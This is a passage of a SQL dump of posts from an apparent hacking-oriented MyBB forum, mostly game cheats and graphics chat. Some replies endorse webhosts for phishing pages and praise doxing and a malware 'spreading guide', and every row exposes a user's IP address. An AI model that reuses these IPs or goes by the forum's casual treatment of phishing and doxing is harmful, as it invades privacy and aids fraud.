'0', '1', '904866692558445f711419165a82c852', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5349', '950', '0', '35', 'Which theme do you like better?', '0', '222', 'Exposé', '1350558730', 'Do you like this one... http://www.purevb.com/demo/forum.php?styleid=147 or.... one like I already have setup... http://badassforums.net', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a2b1a5078b9159561e4bd05872474f9b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5350', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '62', 'R?????zo?', '1350559555', 'I will give this a try, looks cool :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '4b3a4ba1a9454f49bdca103800fff32a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5351', '950', '5349', '35', 'RE: Which theme do you like better?', '0', '62', 'R?????zo?', '1350559995', 'Both look cool, but the 2nd one is better :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'a2d4502a12929befd7046ac652aab06b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5352', '941', '5271', '35', 'RE: Logo Competition for LH?', '0', '61', 'NXK', '1350561413', 'Thread has been moved, And yes I think this is a pretty good idea :]', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '3dd3c6e5f10c3c3281246ecf0c702bae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5353', '928', '5194', '49', 'RE: MOTM', '0', '205', 'mothered', '1350561857', 'Yeah, this\'ll be a good addition to the forum. It\'s a great Incentive to members.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '13e4c362ad3d62f9a4ae94b0a3445257', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5354', '945', '5288', '7', 'RE: I dont want.......', '0', '61', 'NXK', '1350561941', 'I\'m pretty sure joker made it a rule to not do that, If you see any threads with post/pm let me know. Ill take care of it.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '50bc3ff8c8ca97e937e83ce213e9fba8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5355', '935', '5256', '19', '[Junk]Couple of cracked programs.', '0', '61', 'NXK', '1350561999', 'This thread has been junked. [hr] This thread has been junked.', '99.253.94.204', '1677549260', '1', '0', '61', '1350562000', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5356', '938', '5259', '46', 'RE: List of good webhosts to host your phishing pages', '0', '61', 'NXK', '1350562142', 'Ill be checking these hosts out soon. Mine doesn\'t like me hosting malicious content.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '562c6e2e01cd23b9e5cfd8df5fd0e0fd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5357', '945', '5354', '7', 'RE: I dont want.......', '0', '205', 'mothered', '1350562219', '[quote=\'NXK\' pid=\'5354\' dateline=\'1350561941\'] I\'m pretty sure joker made it a rule to not do that, If you see any threads with post/pm let me know. Ill take care of it. [/quote] Shall do mate. I do agree, that the download link should be provided In the thread.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '96e06b8089a80d9a2e5688394ad89346', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5358', '938', '5259', '46', 'RE: List of good webhosts to host your phishing pages', '0', '205', 'mothered', '1350562469', 'x10Hosting Is pretty good. I haven\'t checked the rest, hence shall do so soon. Thanks mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'b6e437ade88af970cfbbc6b30a7df758', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5359', '775', '3997', '75', 'RE: GTA San Andreas Cheats', '0', '205', 'mothered', '1350562653', 'Nice one mate. I\'ll forward this to a friend of mine, who\'ll certainly find It of benefit. Appreciated.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'dd60130d06f0708e0fa45f4c43785cf1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5360', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '205', 'mothered', '1350563067', 'I\'m thinking what I should think of next, but I\'ve already thought It, so I think I\'ll think of something after the next thought, but when the next thought comes, I would have thought of It already.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '4bd3575dd36355ac3fa4814201dfb9a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5361', '940', '5270', '7', 'RE: TheAnarchist I have your dox!', '0', '228', 'VirtualLegend', '1350563100', 'The Anarchist are just little kids', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'c372336fabcc34b9ff929399b0d4fe12', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5362', '928', '5194', '49', 'RE: MOTM', '0', '228', 'VirtualLegend', '1350563162', 'Very good idea Keep it up like this !', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '0f3900d2f2af2fc1321c54c7b87b5f7a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5363', '951', '0', '71', 'L33thacking Minecraft Server', '10', '228', 'VirtualLegend', '1350563758', '[align=center][size=medium][color=#32CD32]Hello Gamers, I had a idea to make our own L33thacking Minecraft server. Unfortunately i don\'t have any experience on how to make a minecraft server. So thats why I\'m looking for someone that has experience. If you think It\'s a good idea let me know, or else i won\'t do it I was thinking of a Raiding server with clans. I like to fight with other clans/people. If you have a other idea, let me know][/color][/size][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'fff056401766395e7a31ed03dd70ad9b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5364', '928', '5212', '49', 'RE: MOTM', '0', '2', 'Apathy', '1350563774', '[quote=\'ƒ???????????g\' pid=\'5212\' dateline=\'1350525419\'] Lol yeh I think joker or a super mod should post this...to make it official [/quote] What am I chopped liver?:?:', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '41aff4d3b702624fde4e9afe5efcbc21', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5365', '710', '3637', '12', 'RE: Ultimate Spreading Guide', '0', '228', 'VirtualLegend', '1350563972', 'Very Helpfull Tutorial !!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '79ec2ad44020bfcbcfb49353a67c4293', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5366', '952', '0', '34', 'A nice clean signature tutorial', '9', '2', 'Apathy', '1350564320', '[img]http://fc03.deviantart.net/fs70/i/2012/032/b/2/glamorous_signature_tutorial_by_xatorihs-d4o7svk.png[/img] Credits to xatorihs.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '23371a424333c4eaa53b736bad3c7078', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5367', '953', '0', '34', '| [ Newbie Guide ] Photoshop Site\'s For Beginners | [ Very Helpful ] |', '0', '228', 'VirtualLegend', '1350564502', '[color=#FFFFFF][align=center]Hi, Renders/C4d\'s http://www.planetrenders.net http://www.clantemplates.com/renders/gallery/ http://www.thedesignworld.com/renders/ Tutorials http://www.sigtutorials.com/ http://www.gfxpalace.com http://www.gfxvoid.com http://www.signaturetutorials.com/ http://www.allsigs.com/ All The links Above are very Helpful. If you want to get new ideas or methods than the links are very helpful to you. More links are welcome.[/align][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '8537de04e4adeeef169e231f464dd12f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5368', '928', '5194', '49', 'RE: MOTM', '0', '222', 'Exposé', '1350565505', 'Haha mah B bro...nah...always forget about ya....', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '0d94cd88f08fd4dde1217eb572690ab5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5369', '321', '1502', '34', 'RE: Full Signature Tutorial', '0', '228', 'VirtualLegend', '1350571356', 'Looks Awesome and helpful', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '7eed189e67bb7425028aa3d6c0aa243b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5370', '950', '5349', '35', 'RE: Which theme do you like better?', '0', '228', 'VirtualLegend', '1350571550', 'I think the first looks better, i don\'t like the pumpkin avatar :p', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '5de067271b96ace1ede47c4dc5748fd0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5371', '954', '0', '35', '/\\ New Signature | Rate My Graphics !!! /\\', '0', '228', 'VirtualLegend', '1350572880', '[align=center][size=medium][color=#FFFFFF]Hello, I made a new signature: What do you think? Any tips? [img]http://i.imgur.com/97auP.jpg[/img] If you want to use it. Go Ahead I don\'t mind. If you want a other signature. I will make one for you. Just leave a post behind[/color][/size][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '04fb012a53b471e78483fd5b08e3d781', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5372', '952', '5366', '34', 'RE: A nice clean signature tutorial', '0', '228', 'VirtualLegend', '1350573171', 'Nice Tutorial, but did you make it yourself?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '075bba952c50dc32c37d975039baa9c4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5373', '940', '5270', '7', 'RE: TheAnarchist I have your dox!', '0', '61', 'NXK', '1350574549', 'We worked on it for a very long time last night, But damn forsaken went all night.. Huge props to this guy.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '8f5e915c98e0b0ddcc986303aba0e978', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5374', '873', '4718', '7', 'RE: What do you think of Facebook?', '0', '61', 'NXK', '1350574616', 'It comes it handy to talk to friends, and keep track of upcoming social events. But twitter is where it\'s at :)', '99.253.94.204', '1677549260', '1', '0', '61', '1350587062', '1', '3b33a32881010a7d8f2aa0ac75206830', '0', '1350587062'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5375', '873', '4718', '7', 'RE: What do you think of Facebook?', '0', '228', 'VirtualLegend', '1350575421', 'Don\'t have FaceBook but it seems awesome and i heard it\'s great for promoting', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'c736e543400b2929898df73183ee26b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5376', '954', '5371', '35', 'RE: /\\ New Signature | Rate My Graphics !!! /\\', '0', '62', 'R?????zo?', '1350576110', 'Looks cool, I like it! Good job.', '188.37.47.96', '-1138413728', '1', '0', '0', '0', '1', '715875848cdd4d3704d1bf9fdb49fee5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5377', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '100', '??zg???g????61', '1350578459', 'Fortunately I have a LOT of experience running servers. I\'m sending you a Skype message to you now.', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', 'd66e040208aa9c484202259db645c2f5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5378', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1350578833', 'http://www.socialblade.com/youtube/user/YOURCHANNEL', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '5d0131c2841afeb00ef8e39142af16a1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5379', '948', '5350', '74', 'RE: MINECRAFT world download', '0', '257', 'XxTREYZxX', '1350589683', '[quote=\'R?????zo?\' pid=\'5350\' dateline=\'1350559555\'] I will give this a try, looks cool :) [/quote] how did it go for you + he is only 8', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '2d3c02faf4c654514a47f6489767d97a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5380', '954', '5371', '35', 'RE: /\\ New Signature | Rate My Graphics !!! /\\', '0', '257', 'XxTREYZxX', '1350590063', 'i really like it, keep up the good work :)', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'cc6a5d504e0ada4e56e1bd5607e68b42', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5381', '918', '5311', '65', 'RE: I feel famous', '0', '264', 'D?ea', '1350590121', '[quote=\'R?????zo?\' pid=\'5311\' dateline=\'1350550572\'] Dont you get like loads of money if you partner with them though? [/quote] They takes 80% of your earnings. RPMNetwork / SocialBlase, only takes 40%', '90.185.118.218', '1522104026', '1', '0', '0', '0', '1', '0e2588333b9a8fee3fee22b7ad142f73', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5382', '938', '5259', '46', 'RE: List of good webhosts to host your phishing pages', '0', '257', 'XxTREYZxX', '1350590508', 'thanks for the great share. its pretty good :)', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '5740328af95c0fb3fe6dc2878f439388', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5383', '321', '1502', '34', 'RE: Full Signature Tutorial', '0', '257', 'XxTREYZxX', '1350591932', 'this looks great i love it ,keep up the good work:)', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '2880039fd528d034bed7a7a4be6a24e4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5384', '955', '0', '75', 'saints row 2 cheats', '0', '257', 'XxTREYZxX', '1350592621', 'hey l33T, i saw a thread about saints row 3, so today im going to do a saints row 2 cheats. hope you enjoy:O Pause the game, then access the cell phone. Select \"Dial\", then enter one of the following numbers, including the # symbol, and choose \"Call\". If you entered the code correctly, a message will appear. Then, go to \"Cheats\", and select the now unlocked option. Full Health #1 Car Mass (increased mass for harder collisions) #2 Milk Bones (increased melee attack damage) #3 Add Police Notoriety (+1 star to police wanted meter) #4 Player Pratfalls (press LB or RB to fall) #5 Infinite Sprint #6 Unlimited Clip (never reload, except for RPGs) #9 Infinite Ammo #11 Heaven Bound (killed bodies float upward) #12 Add Gang Notoriety (+1 gang attack level) #35 Never Die #36 No Cop Notoriety #50 No Gang Notoriety #51 I Am Giant (become very tall) #200 Itty Bitty (become very short) #201 Give Cash (gain $1,000) #2274666399 Repair Car (fixes car, boat, and helicopter damage) #1056 Ambulance #1040 Anchor #1041 Atlasbreaker #1042 Attrazione #1043 Backdraft #1044 Backhoe #1045 Bag Boy #1046 Baron #1047 Bear #1048 Bootlegger #1049 Bulldog #1050 Bulldozer #1051 Compton #1052 Eiswolf #1053 FBI #1054 Five0 #1055 Hollywood #1057 Justice #1058 Kent #1059 Mag #1060 Mixmaster #1061 Mongoose #1062 Oring #1063 Phoenix #1064 Quasar #1065 Quota #1066 Rampage #1067 Raycaster #1068 Reaper #1069 Septic Avenger #1070 Shaft #1071 Stilwater Municipal #1072 Superiore #1073 Taxi #1074 The Job #1075 Titan #1076 Toad #1077 Varsity #1078 Venom Classic #1079 Vortex #1080 Zenith #1081 Horizon (commerical helicopter) #711 Snipes57 (executive private jet) #712 Tornado (police helicopter with minigun and anti-tank missiles; can lock onto other vehicles or be manually aimed) #713 Wolverine (P-51 Mustang-style airplane with machine gun) #714 Kaneda (custom street racing motorcycle) #801 Kenshin (street racing motorcycle) #802 Melbourne (Harley-style motorcycle) #803 Sabretooth (custom Harley-style motorcycle) #804 Sandstorm (dirtbike) #805 Widowmaker (moped) #806 Hurricane (speedboat) #825 Miami #826 Python #827 Shark (personal watercraft) #828 Skipper (yacht) #829 hope you enjoyed', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', 'baef6953323c1df291a60b3cb8d361f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5385', '956', '0', '75', 'Halo tips,tricks and cheats :O', '0', '257', 'XxTREYZxX', '1350593169', 'hey L33T, here are some halo 3 cheats,tips.tricks:O hope you enjoy Lower weapon During a local match or replay, click Left Analog-stick + LB+ RB + A + Down for approximately three seconds. If done correctly, your weapon will not be visible on your screen. When you shoot, your weapon will be raised again. -From: Dirttbagg and darthvader302 Show coordinates During a local match or replay, click Left Analog-stick + click Right Analog-stick + LB + RB + Down/Right. Toggle panning camera During a local match or replay, click Left Analog-stick + click Right Analog-stick + LB + RB + Up/Left. Infinite Spartan laser in Halo mission Use the following trick to get a Spartan laser with unlimited ammunition in the \"Halo\" mission. Play through the level until you meet up with Sergeant Johnson. Shoot him until he falls down and drops the Spartan laser. Quickly pick it up, and shoot it at him. Keep shooting him until he kills you. When you respawn, knock him down again, and pick up his laser. He should get back up with another laser on his back. When he does, shoot him down again, and pick up the new gun he drops. This laser should now have unlimited Spartan ammunition. This makes it easier to destroy the Guilty Spark 343. -From: Camuel Katana Successfully complete all achievements (1000/1000) and find all Skulls to unlock the Katana. Recon armor (Mythic Map Pack DLC) Get the three \"Vid Master Challenge\" achievements in the \"Mythic Map Pack\" bonus downloadable content to unlock the Recon armor. Bonus downloadable content Successfully complete the game on the Legendary difficulty to get bonus pictures and a \"Making of\" video from Xbox Live. Alternate endings There are three endings. The first ending is shown when the game is successfully completed on the Easy, Normal, or Heroic difficulty setting. The second ending is shown when the game is successfully completed on the Legendary difficulty setting. The third ending is shown when the game is successfully completed on the Legendary difficulty setting with all Skulls activated. Easier Legendary mode If you are playing alone on the Legendary difficulty setting, turn on an idle second player to stay behind. If you die, you will respawn instead of restarting. Super fast Spartan laser fire In Forge mode, get a Spartan laser. Charge it until it is almost about to fire. Before you fire, turn into the Monitor. Fly around until you find a target. Before you turn back into a human, hold RT to fire the Spartan laser almost instantly (if done correctly). You can use the Monitor\'s aimer to aim the laser. Smarter respawning When playing in Co-op mode on the Legendary difficulty setting, it is best to have one player keep their distance from the enemy at all times. By doing this, if the rest of the players die, they will respawn around the player that is farther back, rather than having to restart at the checkpoint. Preventing lag To clear the hard drive cache and prevent lag in Solo and Multiplayer mode, when starting the game, hold A + Up. Select \"Yes\" when you are asked if you want to clear the cache. Easy experience in Multiplayer mode Note: This trick requires four active accounts on your console that are all able to play on Xbox Live. Enter the matchmaking lobby, and choose \"Social\", then \"Rumble Pit\". Sign all four of your accounts in the lobby. In free for all modes, you have to be in the top three to earn experience points. Start matchmaking, and it should find two additional players. Once the game begins, you can simply do nothing. Once the game ends, all four of your accounts will tie for third place, giving all of them easy experience points. -From: Brandon Adkins Getting in the same ranked Lone Wolves game Go to the Xbox 360 Dashboard. Change your language to the second option from the bottom, then start Halo 3. Invite four other friends that are about the same rank as you, and have them change their language to the same one as you. Get everyone in the same party; everyone must search at the same time. Everyone must then make a game in Lone Wolves. Before you go to start the countdown, press X to change the search options to the bottom one, which is to search for the same language. If done correctly, you should be in the same ranked Lone Wolves game as your friends. You can now get achievements or level someone up. Extra grenades In Multiplayer or System Link mode, when you kill someone, slash their dead body with the Energy Sword for more grenades come out of it. Armor permutations Successfully complete the indicated task in Campaign mode to unlock the corresponding armor part in Multiplayer mode: thanks for your time i hop you enjoy them:)', '203.104.11.3', '-882373885', '1', '0', '0', '0', '1', '178a29f08844a7945e3019ad0879884a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5386', '957', '0', '9', '| [ Get ] My Mobile Business In A Box | Start Your Own Mobile Business |', '0', '228', 'VirtualLegend', '1350593317', '[align=center][img]http://img714.imageshack.us/img714/5963/wso1.gif[/img] [img]http://img221.imageshack.us/img221/3025/wso2.gif[/img] [img]http://img96.imageshack.us/img96/7060/wso3.gif[/img] [img]http://img842.imageshack.us/img842/2774/wso4.gif[/img] [img]http://img842.imageshack.us/img842/2774/wso4.gif[/img] [img]http://img196.imageshack.us/img196/5286/wso5.gif[/img] [img]http://img196.imageshack.us/img196/5286/wso5.gif[/img] [color=#FF0000][size=xx-large]Download Link: [quote]https://www.dropbox.com/sh/2htazms11o1djgb/vn_fGztT82[/quote][/size][/color][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '60be7721ca1a48dfec0a16152d88c488', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5387', '958', '0', '73', 'subway surfers', '17', '257', 'XxTREYZxX', '1350593440', 'hey L33T,, here are some subway surfer cheats and tips hopr you enjoy :P Unlockables Any character unlocked Go onto the characters click select on the first boy, then you go onto the girl and hold down select. If you want any other character keep holding of the button select and slide across to the next character or the character you want and take your finger of and click select on the character you want! Unlocking Fresh faster Press on the kid with the hood. While selected go over to fresh or any of the other character and press the box where the fraction of the amount you have for that character is. To play as say spike after fresh you\'ll have to do it while selected hood kid is taken as well. Two character tokens Just use your coins to buy mystery boxes, they contain character tokens and coins. Or if you run in between 2 trains than you will flip back and hit the screen and so will the cop and his dog. Hints Power-ups Power-ups that you can pick up while playing are: Jetpack which allows you to fly over all of the trains and collect a trail of coins along the way. Super Sneakers will make your character run faster than normal, and will pick up any coins under them. Coin Magnet will collect all of the coins in the vicinity around you. 2X Multiplier will double your score while it is active. All of these power-ups only last a limited time, so make sure you take advantage of them while they’re active. Bump Into Barriers Jump early or jump late and you\'ll bump into the red and white barriers without being caught by the inspector and his dog. Friend Runs A cool way to make extra coins is by having your friends run so you can earn additional money. For each 50 friend runs, you will earn a coin bag with valuable coins inside.', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', 